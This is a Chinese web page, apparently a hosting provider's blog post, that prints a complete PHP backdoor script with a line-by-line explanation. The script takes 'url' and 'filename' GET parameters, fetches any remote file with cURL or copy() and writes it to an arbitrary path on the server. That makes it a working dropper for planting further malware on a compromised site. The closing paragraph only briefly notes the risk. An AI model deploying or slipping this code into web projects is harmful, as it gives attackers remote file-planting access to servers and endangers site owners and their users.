一个PHP后门代码:允许通过URL参数直接下载文件到服务器

<?php
set_time_limit(0);

if(isset($_GET['url']) && isset($_GET['filename'])){
        if(httpcopy($_GET['url'], $_GET['filename'])){
            echo("Done.");
        }else{
            echo("Down Error.");
        }
}else{
        die('Input error.');
}

function httpcopy($url, $file="", $timeout=60) {
    $file = empty($file) ? pathinfo($url,PATHINFO_BASENAME) : $file;
    $dir = pathinfo($file,PATHINFO_DIRNAME);
    !is_dir($dir) && @mkdir($dir,0755,true);
    $url = str_replace(" ","%20",$url);

    if(function_exists('curl_init')) {
                echo "curl ";
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
        $temp = curl_exec($ch);
        if(@file_put_contents($file, $temp) && !curl_error($ch)) {
            return $file;
        } else {
            return false;
        }
    } else {
                echo "copy ";
        $opts = array(
            "http"=>array(
            "method"=>"GET",
            "header"=>"",
            "timeout"=>$timeout)
        );
        $context = stream_context_create($opts);
        if(@copy($url, $file, $context)) {
            //$http_response_header
            return $file;
        } else {
            return false;
        }
    }
}
?>

这段代码是PHP语言编写的,它的作用是从一个指定的URL下载文件,并将其保存到服务器上。下面是代码的逐行解释:

  1. set_time_limit(0); – 设置脚本的执行时间无限制,这样脚本可以运行任意长的时间。
  2. if(isset($_GET['url']) && isset($_GET['filename'])){ – 检查是否有GET请求的参数urlfilename
  3. if(httpcopy($_GET['url'], $_GET['filename'])){ – 如果httpcopy函数成功执行,即文件下载成功。
  4. echo("Done."); – 输出“Done.”表示文件下载并保存成功。
  5. }else{ – 如果httpcopy函数执行失败。
  6. echo("Down Error."); – 输出“Down Error.”表示下载过程中出现了错误。
  7. }else{ – 如果没有GET请求的参数urlfilename
  8. die('Input error.'); – 终止脚本执行并输出“Input error.”表示输入错误。
  9. function httpcopy($url, $file="", $timeout=60) { – 定义了一个名为httpcopy的函数,它接受三个参数:文件的URL、文件名(可选,默认为空),以及超时时间(默认60秒)。
  10. $file = empty($file) ? pathinfo($url,PATHINFO_BASENAME) : $file; – 如果没有提供文件名,就使用URL的最后一部分作为文件名。
  11. $dir = pathinfo($file,PATHINFO_DIRNAME); – 获取文件名的目录路径。
  12. !is_dir($dir) && @mkdir($dir,0755,true); – 如果目录不存在,则创建目录,权限设置为755。
  13. $url = str_replace(" ","%20",$url); – 将URL中的空格替换为%20,因为URL中不能直接包含空格。
  14. if(function_exists('curl_init')) { – 检查服务器是否支持cURL。
  15. echo "curl "; – 如果支持cURL,输出“curl”。
  16. 使用cURL进行文件下载,如果成功则保存到指定的文件路径。
  17. else { – 如果服务器不支持cURL。
  18. echo "copy "; – 输出“copy”。
  19. 使用PHP的stream_context_createcopy函数进行文件下载,如果成功则保存到指定的文件路径。
  20. } – 函数定义结束。

这段代码存在安全风险,因为它允许通过URL参数直接下载文件到服务器,这可能会导致恶意文件被下载和执行。在实际应用中,这样的脚本应该进行严格的安全检查和限制。

给TA打赏
共{{data.count}}人
人已打赏
在线客服
主机帮
我们将24小时内回复。
2024-11-04 19:03:55
您好,有任何疑问请与我们联系!
您的工单我们已经收到,我们将会尽快跟您联系!
[QQ客服]
176363189
当幸福来敲门
[小黄]
17307799197
[企业邮箱]
sudu@yunjiasu.cc
取消

选择聊天工具: